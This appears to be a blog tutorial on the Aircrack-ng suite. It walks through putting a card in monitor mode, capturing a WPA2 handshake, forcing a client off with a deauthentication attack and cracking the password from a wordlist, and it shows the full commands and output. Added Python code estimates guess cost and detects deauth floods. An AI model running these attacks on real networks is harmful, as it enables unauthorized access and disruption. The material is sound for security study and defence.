
Aircrack-ng

August 15, 2023 · 12 minute read

Overview

Wi-Fi is a technology that enables wireless networking and internet connectivity. It allows devices such as computers, smartphones, and tablets to connect to the internet without the need for cables. Wi-Fi works by using radio waves to transmit data wirelessly between devices and access points. The technology is built on the IEEE 802.11 standards, which define the rules and protocols for wireless communication, including frequency bands, modulation techniques, security mechanisms, and more.
Before beginning it is important to understand some key terms:
While Wi-Fi is an immensely valuable tool, it is susceptible to a wide range of attacks. One of the tools commonly used for testing the security of Wi-Fi networks is a suite known as Aircrack-ng.
Aircrack-ng is a suite of wireless network security tools designed for monitoring, analyzing, and attacking Wi-Fi networks. Aircrack-ng contains modules capable of packet capture, packet analysis, packet injection, rogue access point attacks, and more.
A comprehensive list of Aircrack-ng tools can be found below:
DISCLAIMER: The information provided in this article is intended for EDUCATIONAL purposes only. It is NOT intended to promote, encourage, or condone any illegal or unethical activities. Any actions taken based on information provided in this article are at the sole discretion and risk of the user. By reading this article, you acknowledge and agree to these terms.

Cracking Wi-Fi Passwords

A simplified overview of cracking Wi-Fi passwords can be seen below:
It's important to note that the strength of the password greatly affects the feasibility of cracking. Longer, uncommon, more complex passwords are EXTREMELY difficult to crack using these methods.
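To make the cost argument concrete, the following added example (not code from the original post) derives the WPA/WPA2-Personal pairwise master key the way the standard defines it, which is the value aircrack-ng later prints as "Master Key", and measures what a single passphrase guess costs on the machine running it. The SSID is the PBKDF2 salt, so precomputed tables only work per SSID; the charset size, passphrase length and measured cost fed to the estimate are assumed inputs.

```python
import hashlib
import time

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes),
    as defined in IEEE 802.11i. This is the value aircrack-ng reports as 'Master Key'
    once a candidate passphrase reproduces the captured handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmk_cost_seconds(ssid: str, samples: int = 50) -> float:
    """Average wall-clock cost of one PMK derivation on this machine.
    Every candidate passphrase pays this cost; the 4096 iterations exist to make
    each guess expensive."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"sample-{i}", ssid)  # constructed throwaway candidates
    return (time.perf_counter() - t0) / samples

def worst_case_search_years(charset_size: int, length: int, seconds_per_guess: float) -> float:
    """Time to try every passphrase of the given length at the measured per-guess cost.
    Each extra character multiplies the keyspace by the charset size, which is why
    long passphrases are out of reach for the dictionary attack shown on this page."""
    return charset_size ** length * seconds_per_guess / (365 * 24 * 3600)
```

Running `worst_case_search_years(26, 8, pmk_cost_seconds("IEEE"))` against the same call with length 16 shows the gap between a short lowercase password and a long one at this machine's speed.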

Practical Demonstration

In order to capture the packets containing the handshake, we must first configure our wireless interface to passively listen to all wireless communications within its range. This can be done with Airmon-ng; a demonstration can be seen below.
```
# Check for processes that might interfere with the aircrack-ng suite and KILL them.
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng check kill
Killing these processes:

  PID Name
  763 wpa_supplicant

# Start monitor mode on the target wireless interface
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng start [WIRELESS INTERFACE NAME]

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

# Ensure that the target wireless interface is in monitor mode
┌──(root㉿kali)-[/home/kali]
└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.5 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```
After configuring our wireless interface to function in monitor mode, passively intercepting all traffic, the next step is to use Airodump-ng to obtain information about our targeted network. An example can be seen below.
If we want airodump-ng to listen to a specific network, we can use the following syntax: sudo airodump-ng wlan0mon -d [BSSID OF TARGET NETWORK]. If no BSSID is specified, airodump-ng will capture data from all networks in range.
```
┌──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng wlan0mon

 CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 7F:9E:2C:1D:A5:8B   25  16       10        0    0  11  51.  WPA              NETGEAR

 BSSID              STATION            PWR   Rate   Lost  Packets  Notes  Probes

 9D:1E:F0:3B:7A:5C  00:0F:B5:32:31:31   61  16-54      2       18
```
The next step is to attempt to capture the WPA Handshake from a user that is connected to the network. A WPA handshake, also known as a 4-way handshake, is a process that occurs when a device attempts to connect to a Wi-Fi network secured with WPA or WPA2. The handshake is designed to establish a secure and encrypted connection between the client and the access point.
We can do this by utilizing two Aircrack-ng modules: Airodump-ng to listen for and sniff the WPA handshake, and Aireplay-ng to initiate a deauthentication attack so that clients must reconnect to the access point.
```
# Use Airodump-ng to sniff the handshake
# -w results   prefix of the capture files to write
# -c 11        channel of the target network
# --bssid      MAC address of the target access point
┌──(root㉿kali)-[/home/kali]
└─# sudo airodump-ng -w results -c 11 --bssid 7F:9E:2C:1D:A5:8B wlan0mon

 CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 7F:9E:2C:1D:A5:8B   25  16       10        0    0  11  51.  WPA              NETGEAR

 BSSID              STATION            PWR   Rate   Lost  Packets  Notes  Probes

 9D:1E:F0:3B:7A:5C  00:0F:B5:32:31:31   61  16-54      2       18

# Deauthentication attack
# -0        means deauthentication
# 10        the number of deauthentication packets to send; 0 means continuously
# -a        MAC address of the access point
# -c        MAC address of the client to deauth; if omitted, all clients are deauthenticated
# wlan0mon  interface name
┌──(root㉿kali)-[/home/kali]
└─# sudo aireplay-ng -0 10 -a 7F:9E:2C:1D:A5:8B -c 9D:1E:F0:3B:7A:5C wlan0mon
11:32:32  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:32  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:33  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]
11:32:35  Sending DeAuth to station   -- STMAC: [9D:1E:F0:3B:7A:5C]

# The handshake is captured once the "WPA handshake" field shows the target BSSID
 CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 7F:9E:2C:1D:A5:8B
```
Afterwards, you should have the results of the packet capture in your directory with whatever file name you designated. You can then analyze and crack the password using Aircrack-ng.
Once this is complete, remember to turn monitor mode off so your connection to the internet can be restored.
```
┌──(root㉿kali)-[/home/kali]
└─# sudo airmon-ng stop wlan0mon

# Begin dictionary attack with a wordlist
┌──(root㉿kali)-[/home/kali]
└─# sudo aircrack-ng results.cap -w rockyou.txt

                                 Aircrack-ng 1.4

                   [00:00:03] 561 keys tested (3126.25 k/s)

                           KEY FOUND! [ iloveyou ]

      Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
                       39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 35 55 24 EE

      Transient Key  : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
                       63 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
                       AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
                       D9 6F 76 5B 8C D3 DF 13 2F BC AA 6A 6E D9 62 CD

      EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
```
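The deauthentication burst in the walkthrough above is loud on the air, and a wireless IDS catches it by rate, not by address, because the attacker spoofs the access point's MAC. The following added example (not code from the original post or from Aircrack-ng) parses raw 802.11 management frames and raises an alert when one sender's deauthentication frames exceed a threshold inside a short window; the frames are constructed inline, reusing the AP and client MACs from the captures above, and the threshold and window are assumed tuning values. Enabling 802.11w (Protected Management Frames) on the access point is the mitigation, since it makes forged deauthentication frames fail integrity checks.

```python
import struct
from collections import defaultdict, deque

DEAUTH = (0, 12)  # 802.11 frame type 0 (management), subtype 12 (deauthentication)

def parse_80211_header(frame: bytes):
    """Split a raw 802.11 frame (no radiotap header, no FCS) into
    (type, subtype, addr1, addr2, addr3, body)."""
    if len(frame) < 24:
        raise ValueError("frame too short for an 802.11 MAC header")
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return ftype, subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), frame[24:]

def deauth_flood_alerts(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_frame). Alert once per sender
    when its deauth frames within `window` seconds reach `threshold`.
    The source address only attributes the burst; an attacker spoofs the AP's
    MAC, so the rate, not the address, is what gets detected."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        ftype, subtype, dst, src, bssid, body = parse_80211_header(raw)
        if (ftype, subtype) != DEAUTH:
            continue  # beacons, data frames, etc. are not counted
        reason = struct.unpack("<H", body[:2])[0] if len(body) >= 2 else None
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"src": src, "bssid": bssid, "count": len(q), "reason": reason})
    return alerts

def build_frame(fc0: int, dst: bytes, src: bytes, bssid: bytes, body: bytes) -> bytes:
    # Constructed frame: frame control, duration 0, three addresses, sequence 0, body.
    return bytes([fc0, 0x00, 0x00, 0x00]) + dst + src + bssid + b"\x00\x00" + body

AP, STA = bytes.fromhex("7f9e2c1da58b"), bytes.fromhex("9d1ef03b7a5c")  # MACs from the captures above
BEACON = build_frame(0x80, b"\xff" * 6, AP, AP, b"")            # broadcast beacon, ignored
LEAVING = build_frame(0xC0, AP, STA, AP, struct.pack("<H", 3))  # client leaving, reason code 3
SPOOFED = build_frame(0xC0, STA, AP, AP, struct.pack("<H", 7))  # forged "AP" -> client, reason 7

# Constructed sample capture: normal traffic, then ten spoofed deauths inside one
# second, mirroring what `aireplay-ng -0 10` puts on the air.
SAMPLE_CAPTURE = [(0.0, BEACON), (0.5, LEAVING)] + [(10.0 + i * 0.1, SPOOFED) for i in range(10)]
```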

Creating Malicious Rogue Access Points

Rogue access points are unauthorized wireless access points set up on a network without the knowledge or permission of network administrators. They enable various malicious activities such as eavesdropping, man-in-the-middle attacks, malware distribution, data injection, and phishing.
Rogue access points can be used in tandem with evil portals, combining a wireless network attack with phishing. Evil portals appear when a user tries to access a public Wi-Fi network and typically prompt the user to enter login credentials. Attackers set up evil portals to mimic legitimate captive portals, tricking users into entering credentials and giving the attacker access to sensitive information.
I plan to explore creating rogue access points and combining them with evil portals sometime in the future.